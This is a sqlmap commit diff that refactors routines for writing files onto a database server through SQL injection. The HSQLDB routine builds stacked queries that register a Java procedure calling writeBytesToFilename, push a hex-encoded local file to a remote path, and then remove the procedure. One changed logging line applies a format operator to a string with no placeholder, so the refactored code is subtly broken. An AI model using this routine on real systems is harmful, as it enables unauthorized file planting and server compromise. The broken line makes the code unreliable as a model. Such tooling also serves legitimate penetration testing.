Trivial refactoring for #4379

stamparm · stamparm · commit 0585a55ee035 · 2020-10-13T11:05:13.000+02:00
diff --git a/lib/core/settings.py b/lib/core/settings.py
@@ -18,7 +18,7 @@
 from thirdparty.six import unichr as _unichr
 
 # sqlmap version (<major>.<minor>.<month>.<monthly commit>)
-VERSION = "1.4.10.4"
+VERSION = "1.4.10.5"
 TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
 TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
 VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)
diff --git a/plugins/dbms/hsqldb/filesystem.py b/plugins/dbms/hsqldb/filesystem.py
@@ -21,26 +21,23 @@ def readFile(self, remoteFile):
 
     @stackedmethod
     def stackedWriteFile(self, localFile, remoteFile, fileType=None, forceCheck=False):
-
         funcName = randomStr()
-        MAX_BYTES = 2 ** 20
+        max_bytes = 1024 * 1024
 
-        debugMsg = "creating a Java Language Procedure '%s'" % funcName
+        debugMsg = "creating JLP procedure '%s'" % funcName
         logger.debug(debugMsg)
 
-        addFuncQuery = "CREATE PROCEDURE %s (IN paramString VARCHAR, IN paramArrayOfByte VARBINARY(%s)) " % (funcName, MAX_BYTES)
+        addFuncQuery = "CREATE PROCEDURE %s (IN paramString VARCHAR, IN paramArrayOfByte VARBINARY(%s)) " % (funcName, max_bytes)
         addFuncQuery += "LANGUAGE JAVA DETERMINISTIC NO SQL "
         addFuncQuery += "EXTERNAL NAME 'CLASSPATH:com.sun.org.apache.xml.internal.security.utils.JavaUtils.writeBytesToFilename'"
         inject.goStacked(addFuncQuery)
 
-        logger.debug("encoding file to its hexadecimal string value")
-
         fcEncodedList = self.fileEncode(localFile, "hex", True)
         fcEncodedStr = fcEncodedList[0][2:]
         fcEncodedStrLen = len(fcEncodedStr)
 
         if kb.injection.place == PLACE.GET and fcEncodedStrLen > 8000:
-            warnMsg = "the injection is on a GET parameter and the file "
+            warnMsg = "as the injection is on a GET parameter and the file "
             warnMsg += "to be written hexadecimal value is %d " % fcEncodedStrLen
             warnMsg += "bytes, this might cause errors in the file "
             warnMsg += "writing process"
@@ -49,15 +46,14 @@ def stackedWriteFile(self, localFile, remoteFile, fileType=None, forceCheck=Fals
         debugMsg = "exporting the %s file content to file '%s'" % (fileType, remoteFile)
         logger.debug(debugMsg)
 
-        # http://hsqldb.org/doc/guide/sqlroutines-chapt.html#src_jrt_procedures
-        invokeQuery = "call %s('%s', cast ('%s' AS VARBINARY(%s)))" % (funcName, remoteFile, fcEncodedStr, MAX_BYTES)
+        # Reference: http://hsqldb.org/doc/guide/sqlroutines-chapt.html#src_jrt_procedures
+        invokeQuery = "CALL %s('%s', CAST('%s' AS VARBINARY(%s)))" % (funcName, remoteFile, fcEncodedStr, max_bytes)
         inject.goStacked(invokeQuery)
 
-        logger.debug("removing procedure %s from DB" % funcName)
-        delQuery = "DELETE PROCEDURE " + funcName
+        logger.debug("cleaning up" % funcName)
+        delQuery = "DELETE PROCEDURE %s" % funcName
         inject.goStacked(delQuery)
 
-        message = "the local file '%s' has been successfully written on the back-end DBMS" % localFile
+        message = "the local file '%s' has been written on the back-end DBMS" % localFile
         message += "file system ('%s')" % remoteFile
         logger.info(message)
-
diff --git a/plugins/dbms/mysql/filesystem.py b/plugins/dbms/mysql/filesystem.py
@@ -96,7 +96,7 @@ def unionWriteFile(self, localFile, remoteFile, fileType, forceCheck=False):
         fcEncodedStrLen = len(fcEncodedStr)
 
         if kb.injection.place == PLACE.GET and fcEncodedStrLen > 8000:
-            warnMsg = "the injection is on a GET parameter and the file "
+            warnMsg = "as the injection is on a GET parameter and the file "
             warnMsg += "to be written hexadecimal value is %d " % fcEncodedStrLen
             warnMsg += "bytes, this might cause errors in the file "
             warnMsg += "writing process"
